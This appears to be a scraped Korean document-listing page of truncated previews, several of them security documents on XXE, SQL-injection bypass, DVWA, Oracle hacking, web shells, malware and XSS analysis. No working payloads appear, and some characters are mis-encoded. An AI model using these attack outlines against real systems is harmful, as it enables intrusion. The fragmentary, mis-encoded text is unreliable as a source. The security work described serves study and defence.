( 1 / 24 ) SBR-100S 모델에대한 SSID( 네트워크이름 ) 변경하는방법을안내해드립니다. 아래안내사항은제품의초기설정값을기준으로작성되어있습니다. 1. SSID 이란? SSID 는 Service Set Identifier 의약자로무선랜을통해젂송되는모든패킷의헤더에존재하는고유식별자이다. 무선랜클라이언트가무선랜 AP 에접속할때각무선랜을다른무선랜과구붂하기위해사용됩니다.
More informationPowerPoint 프레젠테이션
System Software Experiment 1 Lecture 5 - Array Spring 2019 Hwansoo Han (hhan@skku.edu) Advanced Research on Compilers and Systems, ARCS LAB Sungkyunkwan University http://arcs.skku.edu/ 1 배열 (Array) 동일한타입의데이터가여러개저장되어있는저장장소
More information기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라.
기술문서 14. 11. 10. 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 dokymania@naver.com I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라. Exploit 5 마. 피해 6 III. 결론 6 가. 권고사항 6 I. 소개 가. 역자 본문서는
More information슬라이드 1
Pairwise Tool & Pairwise Test NuSRS 200511305 김성규 200511306 김성훈 200614164 김효석 200611124 유성배 200518036 곡진화 2 PICT Pairwise Tool - PICT Microsoft 의 Command-line 기반의 Free Software www.pairwise.org 에서다운로드후설치
More informationIntro to Servlet, EJB, JSP, WS
! Introduction to J2EE (2) - EJB, Web Services J2EE iseminar.. 1544-3355 ( ) iseminar Chat. 1 Who Are We? Business Solutions Consultant Oracle Application Server 10g Business Solutions Consultant Oracle10g
More informationSecure Programming Lecture1 : Introduction
Malware and Vulnerability Analysis Lecture1 Malware Analysis #1 Agenda 악성코드정적분석 악성코드분석 악성코드정적분석 정적분석 임의의코드또는응용프로그램을실행하지않고분석 ASCII 문자열 (ex. URL) API 리스트 Packing VT 기타등등 정적분석 : 파일식별 악성으로의심되는파일의형태식별 file
More informationAndroid Master Key Vulnerability
Android Master Key Vulnerability Android Bug 8219321 2013/08/06 http://johnzon3.tistory.com Johnzone 内容 1. 개요... 2 1.1. 취약점요약... 2 1.2. 취약점정보... 2 2. 분석... 2 2.1. 기본개념... 2 2.2. 공격방법... 4 3. 방어대책... 7
More information*2008년1월호진짜
3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가
More information[ 요약 ] 개읶소유의 IT 재화를업무에홗용하는 IT 소비재화 (Consumerization) 의대표적읶사회적현상으로개읶모바읷기기를업무에도사용하는 BYOD(Bring Your Own Device) 트렌드가주목받고있다. 기업의 BYOD 선호는개읶화된모바읷기기를업무에홗용함
2013 년 1 월 Technology Inside LG CNS R&D Journal BYOD : Security vs. Privacy 요약 I. BYOD 배경과이슈 II. BYOD 보안기술 III. MDM 솔루션의적용 IV. BYOD 적용시고려사항 저자 : 심선화선임연구원 (sunhwa.shim@lgcns.com) LG CNS 정보기술연구원 / 1 [ 요약
More informationRN 릴리스노트 OWASP TOP 과비교해 2010 릴리스에서달라진점 숙달된공격자, 신기술, 점점더복잡해져가는시스템들은인터넷어플리케이션에대한보안 위협국면을변화시킨다. OWASP TOP 10은정기적인업데이트를통해이변화를반영하고 있다. 이번 2010 릴리스에서
[ 보고서] OWASP TOP10-2010 (RC1) 가장심각한웹어플리케이션보안위험 10가지 ( 출처: http://www.owasp.org/images/0/0f/owasp_t10_-_2010_rc1.pdf) 의견요망 OWASP는 2009년 12월 31일까지 1개월동안 OWASP TOP 10-2010에대한의견을공개접수 한후 2010년 1/4 분기에최종판을릴리스할예정이다.
More informationMicrosoft PowerPoint - 11주차_Android_GoogleMap.ppt [호환 모드]
Google Map View 구현 학습목표 교육목표 Google Map View 구현 Google Map 지원 Emulator 생성 Google Map API Key 위도 / 경도구하기 위도 / 경도에따른 Google Map View 구현 Zoom Controller 구현 Google Map View (1) () Google g Map View 기능 Google
More informationJDBC 소개및설치 Database Laboratory
JDBC 소개및설치 JDBC } What is the JDBC? } JAVA Database Connectivity 의약어 } 자바프로그램안에서 SQL 을실행하기위해데이터베이스를연결해주는응용프로그램인터페이스 } 연결된데이터베이스의종류와상관없이동일한방법으로자바가데이터베이스내에서발생하는트랜잭션을제어할수있도록하는환경을제공 2 JDBC Driver Manager }
More informationAbout Yasca Date : Test : Windows XP Professional ServicePack 3 Written by STG Security 천영철 URL :
About Yasca Date : 10. 10. 20 Test : Windows XP Professional ServicePack 3 Written by STG Security 천영철 E-mail : Security4u@gmail.com URL : http://incle.org Introduction to Yasca 1. Purpose Yasca는개발자가 Application
More informationI T C o t e n s P r o v i d e r h t t p : / / w w w. h a n b i t b o o k. c o. k r
I T C o t e n s P r o v i d e r h t t p : / / w w w. h a n b i t b o o k. c o. k r I T C o t e n s P r o v i d e r h t t p : / / w w w. h a n b i t b o o k. c o. k r Jakarta is a Project of the Apache
More informationInterstage5 SOAP서비스 설정 가이드
Interstage 5 Application Server ( Solaris ) SOAP Service Internet Sample Test SOAP Server Application SOAP Client Application CORBA/SOAP Server Gateway CORBA/SOAP Gateway Client INTERSTAGE SOAP Service
More informationMicrosoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc
분석보고서 이동현 (dhclub20@naver.com) SK Infosec Co., Inc MSS 사업본부침해대응팀모의해킹파트 Table of Contents 1. 개요... 3 1.1. 배경... 3 1.2. 목적... 3 2. 공격분석... 4 2.1. Cookie Injection... 4 2.2. Cookie Injection의발생원인... 5 2.3.
More informationMicrosoft Word - Crackme 15 from Simples 문제 풀이_by JohnGang.docx
CrackMe 15.exe (in Simples) 문제풀이 동명대학교정보보호동아리 THINK www.mainthink.net 강동현 Blog: johnghb.tistory.com e-mail: cari2052@gmail.com 1 목차 : 1. 문제설명및기본분석 --------------------------- P. 03 2 상세분석 ---------------------------
More informationMicrosoft Word - junior.docx
Black Falcon Team 첫번째입팀과제보고서 - Damm Vulnerable Web Application - Name : 박영근 Intro Lesson 1 : Brute Force 4 Lesson 2 : Command Execution 9 Lesson 3 : CSRF. 10 Lesson 4 : Insecure CAPTCHA 13 Lesson 5 : File
More informationMobile Service > IAP > Android SDK [ ] IAP SDK TOAST SDK. IAP SDK. Android Studio IDE Android SDK Version (API Level 10). Name Reference V
Mobile Service > IAP > Android SDK IAP SDK TOAST SDK. IAP SDK. Android Studio IDE 2.3.3 Android SDK Version 2.3.3 (API Level 10). Name Reference Version License okhttp http://square.github.io/okhttp/ 1.5.4
More information<4D F736F F F696E74202D203137C0E55FBFACBDC0B9AEC1A6BCD6B7E7BCC72E707074>
SIMATIC S7 Siemens AG 2004. All rights reserved. Date: 22.03.2006 File: PRO1_17E.1 차례... 2 심벌리스트... 3 Ch3 Ex2: 프로젝트생성...... 4 Ch3 Ex3: S7 프로그램삽입... 5 Ch3 Ex4: 표준라이브러리에서블록복사... 6 Ch4 Ex1: 실제구성을 PG 로업로드하고이름변경......
More informationPortal_9iAS.ppt [읽기 전용]
Application Server iplatform Oracle9 A P P L I C A T I O N S E R V E R i Oracle9i Application Server e-business Portal Client Database Server e-business Portals B2C, B2B, B2E, WebsiteX B2Me GUI ID B2C
More informationC++ Programming
C++ Programming 예외처리 Seo, Doo-okok clickseo@gmail.com http://www.clickseo.com 목 차 예외처리 2 예외처리 예외처리 C++ 의예외처리 예외클래스와객체 3 예외처리 예외를처리하지않는프로그램 int main() int a, b; cout > a >> b; cout
More information<4D F736F F F696E74202D20B5A5C0CCC5CDBAA3C0CCBDBA5F3130C1D6C2F75F32C2F7BDC32E >
6. ASP.NET ASP.NET 소개 ASP.NET 페이지및응용프로그램구조 Server Controls 데이터베이스와연동 8 장. 데이터베이스응용개발 (Page 20) 6.1 ASP.NET 소개 ASP.NET 동적웹응용프로그램을개발하기위한 MS 의웹기술 현재 ASP.NET 4.5까지출시.Net Framework 4.5 에포함 Visual Studio 2012
More informationOracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용
Oracle hacking 작성자 : 임동현 (ddongsbrk@naver.com) 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Skill List 1. Oracle For Pentest 1. Find TNS Listener (Default 1521 port) (with nmap or amap) 2. Get the
More information< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B
월간악성코드은닉사이트탐지 동향보고서 (11 월 ) 2012. 12. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 10
More information< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코
월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2013. 03. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3.
More informationTTA Journal No.157_서체변경.indd
표준 시험인증 기술 동향 FIDO(Fast IDentity Online) 생체 인증 기술 표준화 동향 이동기 TTA 모바일응용서비스 프로젝트그룹(PG910) 의장 SK텔레콤 NIC 담당 매니저 76 l 2015 01/02 PASSWORDLESS EXPERIENCE (UAF standards) ONLINE AUTH REQUEST LOCAL DEVICE AUTH
More informationMicrosoft PowerPoint - web-part03-ch20-XMLHttpRequest기본.pptx
과목명 : 웹프로그래밍응용교재 : 모던웹을위한 JavaScript Jquery 입문, 한빛미디어 Part3. Ajax Ch20. XMLHttpRequest 2014년 1학기 Professor Seung-Hoon Choi 20 XMLHttpRequest XMLHttpRequest 객체 자바스크립트로 Ajax를이용할때사용하는객체 간단하게 xhr 이라고도부름 서버
More informationGolden run based Batch Trending – Quick Manual
OVERVIEW Version 1 Issued Date : 30 Sep. 2013 Rev. No. : Revised Date : Issued by : W. K. Oh Copyright Asgard Technologies (UK) Ltd and SAY PLANT Co., Ltd 2013 Table of Contents 1. ProcessVue 개요... 3 2.
More informationiii. Design Tab 을 Click 하여 WindowBuilder 가자동으로생성한 GUI 프로그래밍환경을확인한다.
Eclipse 개발환경에서 WindowBuilder 를이용한 Java 프로그램개발 이예는 Java 프로그램의기초를이해하고있는사람을대상으로 Embedded Microcomputer 를이용한제어시스템을 PC 에서 Serial 통신으로제어 (Graphical User Interface (GUI) 환경에서 ) 하는프로그램개발예를설명한다. WindowBuilder:
More informationEDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-
EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 06월에공개된 Exploit-DB의분석결과, SQL 공격에대한보고개수가가장많았습니다. 이와같은결과로부터여전히 SQL 이웹에서가장많이사용되는임을확인할수있습니다.
More information3. 저장위치를 바탕화면으로 설정하고, 저장을 하고, 실행을 합니다. 4. 바탕화면에 아이콘이 생성되고 아이콘을 더블 클릭합니다. 5. 실행을 클릭하여 프로그램을 설치합니다. 다음버튼을 클릭하고, 사용권 계약에서는 예를 클릭합 니다. 6. 암호 입력창이 뜨면 기본 암호
쉽고 간단한 스마트폰 앱 제작하기 우리가 읷반적으로 사용하고 있는 용어 응용 소프트웨어(application software)는 넓은 의미에서는 운영 체제 위에서 실행되는 모든 소프트웨어를 뜻합니다. 앱(APP) 이라고 줄여서 말하기도 하고, 어플, 어플리케이션 이라고도 합니다. 해당 앱만 설치하면 갂편하게 읶터넷 뱅킹도 이용하고 버스나 지하철 노선이나 차량
More information표준프레임워크로 구성된 컨텐츠를 솔루션에 적용하는 것에 문제가 없는지 확인
표준프레임워크로구성된컨텐츠를솔루션에적용하는것에문제가없는지확인 ( S next -> generate example -> finish). 2. 표준프레임워크개발환경에솔루션프로젝트추가. ( File -> Import -> Existring Projects into
More information설명 Description 상세정보 네이버에서운영하는서비스중하나인쥬니어네이버 ( 이하쥬니버 ) 에서는쥬니버서비스와 관련하여도움을주기위한 [ 그림 1] 과같은플래시애플리케이션이서비스되고있다.[2] [ 그림 1] 쥬니어네이버에서서비스중인쥬니버도우미플래시애플리케이션 해당플래
네이버플래시애플리케이션 XSS 취약점분석보고서 작성일 2013/04/24 작성자 카이스트시스템보안연구실 홍현욱 (karmatia@kaist.ac.kr) 최현우 (zemisolsol@kaist.ac.kr) 김용대 (yongdaek@kaist.ac.kr) 요약 플래시애플리케이션은보고서작성일을기준으로전체웹사이트의 19.5% 가사용하고있으며 [5] 이러한플래시애플리케이션을작동시켜주는플래시플레이어는웹브라우저에기본적으로설치되어있거나웹브라우저에서웹사이트를이용하는사용자들에게자동으로설치하도록유도한다.
More informationMicrosoft PowerPoint - Java7.pptx
HPC & OT Lab. 1 HPC & OT Lab. 2 실습 7 주차 Jin-Ho, Jang M.S. Hanyang Univ. HPC&OT Lab. jinhoyo@nate.com HPC & OT Lab. 3 Component Structure 객체 (object) 생성개념을이해한다. 외부클래스에대한접근방법을이해한다. 접근제어자 (public & private)
More informationF1-1(수정).ppt
, thcho@kisaorkr IPAK (Information Protection Assessment Kit) IAM (INFOSEC Assessment Methodology) 4 VAF (Vulnerability Assessment Framework) 5 OCTAVE (Operationally Critical Threat, Asset, and Vulnerability
More informationLinux Server - FTP Good Internet 소 속 IDC실 이 름 정명구매니저
Linux Server - FTP - Copyright @ 2012 Good Internet 소 속 IDC실 이 름 정명구매니저 E-mail tech@tongkni.co.kr - 1 - INDEX 1. 개요... 3 2. vsftp 설치및설정.... 4 2.1 vsftpd 설치하기.... 4 2.2 환경설정파읷 - vsftpd.conf 설정하기.... 5 2.3
More informationuntitled
웹쉘의현황및분석 2007. 2. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 를명시하여주시기바랍니다. 1. 개요 일반적으로웹서비스에는게시판이나자료실과같은파일을첨부하는기능을포함한다. 이때 txt, jpg, doc와같은데이터파일종류이외에악의적으로제작된스크립트파일인웹쉘을업로드하여해킹하는사고가빈번히발생하고있다. 이와같이서버명령을실행할수있는
More information국외출장복명서 - OWASP & WASC AppSec 2007 참석 IT 기반보호단 / IT 기반기획팀
국외출장복명서 - OWASP & WASC AppSec 2007 참석 - 2007. 11 IT 기반보호단 / IT 기반기획팀 목 차 1. 출장목적 2. 출장자 3. 출장기간및장소 4. 세부일정 5. 활동내용 6. 출장소감및업무활용계획 7. 수집자료 1. 출장목적 o OWASP & WASC AppSec 2007 는웹어플리케이션보안을다루는국제행사로서세계각지에서최고의전문가가참석하여기존홈페이지보안에대한분석결과및최신홈페이지보호기술관련동향에대해발표하고토론하는대규모국제행사임
More informationMicrosoft PowerPoint - CSharp-10-예외처리
10 장. 예외처리 예외처리개념 예외처리구문 사용자정의예외클래스와예외전파 순천향대학교컴퓨터학부이상정 1 예외처리개념 순천향대학교컴퓨터학부이상정 2 예외처리 오류 컴파일타임오류 (Compile-Time Error) 구문오류이기때문에컴파일러의구문오류메시지에의해쉽게교정 런타임오류 (Run-Time Error) 디버깅의절차를거치지않으면잡기어려운심각한오류 시스템에심각한문제를줄수도있다.
More informationAhnLab_template
해킹과침해대응 웹해킹과대응 2013. 10. 17 ( 목 ) 안랩 ASEC 대응팀문영조 Contents 01 웹해킹과취약점 02 웹해킹기법에대한이해 03 웹해킹과침해대응 04 결론 01 웹해킹과취약점 개요 01. 웹해킹과취약점 < 출처 - IBM X-Force 2012 Annual Trend & Risk Report> 4 개요 01. 웹해킹과취약점 웹해킹 (Web
More information어댑터뷰
04 커스텀어댑터뷰 (Custom Adapter View) 커스텀어댑터뷰 (Custom Adapter View) 커스텀어댑터뷰 (Custom Adatper View) 란? u 어댑터뷰의항목하나는단순한문자열이나이미지뿐만아니라, 임의의뷰가될수 있음 이미지뷰 u 커스텀어댑터뷰설정절차 1 2 항목을위한 XML 레이아웃정의 어댑터정의 3 어댑터를생성하고어댑터뷰객체에연결
More informationNetwork Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University
Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University Outline Network Network 구조 Source-to-Destination 간 packet 전달과정 Packet Capturing Packet Capture 의원리 Data Link Layer 의동작 Wired LAN Environment
More information슬라이드 1
웹 2.0 분석보고서 Year 2006. Month 05. Day 20 Contents 1 Chapter 웹 2.0 이란무엇인가? 웹 2.0 의시작 / 웹 1.0 에서웹 2.0 으로 / 웹 2.0 의속성 / 웹 2.0 의영향 Chapter Chapter 2 3 웹 2.0 을가능케하는요소 AJAX / Tagging, Folksonomy / RSS / Ontology,
More information콘텐츠를 싞뢰하지 않는 것을 의미한다. 더욱 앆타 까욲 점은 우리나라 기업의 마케팅 담당자들이 아직까지도 기업 블로그를 기업 홈페이지의 연장선 으로 생각하여, 홈페이지를 통한 마케팅의 실패 과정을 답습하고 있다는 것이다. 대부분의 기업 블로그들이 홈페이지와 동읷한 콘텐
기업 블로그 마케팅이 실패하는 이유 ORICOM BRAND JOURNAL. 2009 04 이재민 (오리콤 미디어본부 읶터렉티브마케팅팀 차장) 기업 홈페이지와 기업 블로그는 어떻게 다른가 편집기와 기본적읶 프로그래밍을 배워야 하고 도메 읶, 호스팅에 대해서도 알아야 했다. 그러나 싸이월 드의 미니홈피가 대히트를 치며 읶터넷을 사용하는 블로그의 개념이 널리 알려지고
More information취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환
취약점분석보고서 [Photodex ProShow Producer v5.0.3256] 2012-07-24 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Photodex ProShow Producer Buffer Overflow 취약점분석... 2 2.1. Photodex ProShow Producer Buffer
More informationTGDPX white paper
White Paper DDoS 공격 대응의 새로운 패러다임 AhnLab TrusGuard DPX Revision Version: AhnLab TrusGuard DPX White Paper ver. 1.0 Release Date: April, 2010 AhnLab, Inc. 6th Fl., CCMM Bldg. 12 Yeouido-dong, Yeongdeungpo-gu,
More information슬라이드 1
QR 코드를통한간편로그인 2018. 11. 7 지도교수 : 이병천교수님 4 조 Security-M 지승우이승용박종범백진이 목 차 조원편성 주제선정 비밀번호가뭐였지? 이런일없이조금더쉽게로그인할수있는방법은없을까? 주제선정 ID와패스워드에의한로그인방식의획기적인변화필요 문자형 ID와패스워드 QR Code 등활용 간편한타겟인식및암기식보안체계의불편극복 인증방식의간소화로다양한분야에서활용가능
More informationData Sync Manager(DSM) Example Guide Data Sync Manager (DSM) Example Guide DSM Copyright 2003 Ari System, Inc. All Rights reserved. Data Sync Manager
Data Sync Manager (DSM) Example Guide DSM Copyright 2003 Ari System, Inc. All Rights reserved. Data Sync Manager are trademarks or registered trademarks of Ari System, Inc. 1 Table of Contents Chapter1
More informationuntitled
시스템소프트웨어 : 운영체제, 컴파일러, 어셈블러, 링커, 로더, 프로그래밍도구등 소프트웨어 응용소프트웨어 : 워드프로세서, 스프레드쉬트, 그래픽프로그램, 미디어재생기등 1 n ( x + x +... + ) 1 2 x n 00001111 10111111 01000101 11111000 00001111 10111111 01001101 11111000
More informationSpring Boot/JDBC JdbcTemplate/CRUD 예제
Spring Boot/JDBC JdbcTemplate/CRUD 예제 오라클자바커뮤니티 (ojc.asia, ojcedu.com) Spring Boot, Gradle 과오픈소스인 MariaDB 를이용해서 EMP 테이블을만들고 JdbcTemplate, SimpleJdbcTemplate 을이용하여 CRUD 기능을구현해보자. 마리아 DB 설치는다음 URL 에서확인하자.
More informationInsertColumnNonNullableError(#colName) 에해당하는메시지출력 존재하지않는컬럼에값을삽입하려고할경우, InsertColumnExistenceError(#colName) 에해당하는메시지출력 실행결과가 primary key 제약에위배된다면, Ins
Project 1-3: Implementing DML Due: 2015/11/11 (Wed), 11:59 PM 이번프로젝트의목표는프로젝트 1-1 및프로젝트 1-2에서구현한프로그램에기능을추가하여간단한 DML을처리할수있도록하는것이다. 구현한프로그램은 3개의 DML 구문 (insert, delete, select) 을처리할수있어야한다. 테이블데이터는파일에저장되어프로그램이종료되어도사라지지않아야한다.
More informationSBR-100S User Manual
( 1 / 13 ) SBR-100S 모델에 대한 사용자 펌웨어 업그레이드 방법을 안내해 드립니다. SBR-100S 는 신규 펌웨어가 있을시 FOTA(자동업데이트) 기능을 통하여 자동 업그레이드가 되며, 필요시 사용자가 신규 펌웨어를 다운받아 수동으로 업그레이드 할 수 있습니다. 1. 준비하기 1.1 연결 장치 준비 펌웨어 업그레이드를 위해서는 SBR-100S
More informationBusiness Agility () Dynamic ebusiness, RTE (Real-Time Enterprise) IT Web Services c c WE-SDS (Web Services Enabled SDS) SDS SDS Service-riented Architecture Web Services ( ) ( ) ( ) / c IT / Service- Service-
More informationMicrosoft PowerPoint - chap01-C언어개요.pptx
#include int main(void) { int num; printf( Please enter an integer: "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; } 1 학습목표 프로그래밍의 기본 개념을
More informationAdvantech Industrial Automation Group
산업용 어플리케이션에서의 USB Written by: Peishan Juan, Advantech Corporation, eautomation Group 산업 자동화에서 어떠한 기술은 사용자에게 도움이 되기도 하고, 그렇지 않기도 한다. 반도체와 소프트웨어 분야의 기술 발젂은 자동화 공정을 더욱 쉽고, 견고하게 만들어 주며 동시에 컴퓨터와 장비를 더욱 스마트한
More information목차 데모 홖경 및 개요... 3 테스트 서버 설정... 4 DC (Domain Controller) 서버 설정... 4 RDSH (Remote Desktop Session Host) 서버 설정... 9 W7CLIENT (Windows 7 Client) 클라이얶트 설정
W2K8 R2 RemoteApp 및 Web Access 설치 및 구성 Step-By-Step 가이드 Microsoft Korea 이 동 철 부장 2009. 10 페이지 1 / 60 목차 데모 홖경 및 개요... 3 테스트 서버 설정... 4 DC (Domain Controller) 서버 설정... 4 RDSH (Remote Desktop Session Host)
More information1. 배경 업무 내용이나 개인정보가 담긴 청구서 등을 메일로 전달 시 중요한 정보가 유출되는 경우가 발생하고 있으며, 이에 따른 메일 암호화 솔루션을 도입하고 있으나 기존 ActiveX를 기반으로 한 플러그인 방식은 여러 가지 제약으로 인해 사용성이 저하되고, 고객 대
Non-ActiveX 방식의 메일암호화 솔루션 1. 배경 업무 내용이나 개인정보가 담긴 청구서 등을 메일로 전달 시 중요한 정보가 유출되는 경우가 발생하고 있으며, 이에 따른 메일 암호화 솔루션을 도입하고 있으나 기존 ActiveX를 기반으로 한 플러그인 방식은 여러 가지 제약으로 인해 사용성이 저하되고, 고객 대응 및 운영 비용이 증가하는 원인이 되어 개선이
More informationJAVA Bean & Session - Cookie
JAVA Bean & Session - Cookie [ 우주최강미남 ] 발표내용소개 자바빈 (Java Bean) 자바빈의개요 자바빈의설계규약 JSP 에서자바빈사용하기 자바빈의영역 세션과쿠키 (Session & Cookie) 쿠키의개요 쿠키설정 (HTTP 서블릿 API) 세션의개요 JSP 에서의세션관리 Java Bean Q. 웹사이트를개발한다는것과자바빈?? 웹사이트라는것은크게디자이너와프로그래머가함께개발합니다.
More informationMicrosoft PowerPoint App Fundamentals[Part1](1.0h).pptx
To be an Android Expert 문양세강원대학교 IT 대학컴퓨터학부 애플리케이션기초 애플리케이션컴포넌트 액티비티와태스크 Part 1 프로세스와쓰레드 컴포넌트생명주기 Part 2 2 Library Java (classes) aapk.apk (android package) identifiers Resource & Configuration aapk: android
More informationPowerPoint Presentation
객체지향프로그래밍 클래스, 객체, 메소드 ( 실습 ) 손시운 ssw5176@kangwon.ac.kr 예제 1. 필드만있는클래스 텔레비젼 2 예제 1. 필드만있는클래스 3 예제 2. 여러개의객체생성하기 4 5 예제 3. 메소드가추가된클래스 public class Television { int channel; // 채널번호 int volume; // 볼륨 boolean
More informationLoveisTouch.com October 2011 LIT Report No [Business Model Workshop, NFC추진전략 ] 개요 2. [Business Model Workshop, NFC추진전략 ] 발표내용 3. NF
LIT Report No.01 1. 2011. 10. 06 [Business Model Workshop, NFC추진전략 ] 개요 2. [Business Model Workshop, NFC추진전략 ] 발표내용 3. NFC 추진전략 Key Point 4. 제2회비즈니스모델워크샵계획 (2012년 1월 10일화요일개최 ) 1. 2011. 10. 06 [Business
More information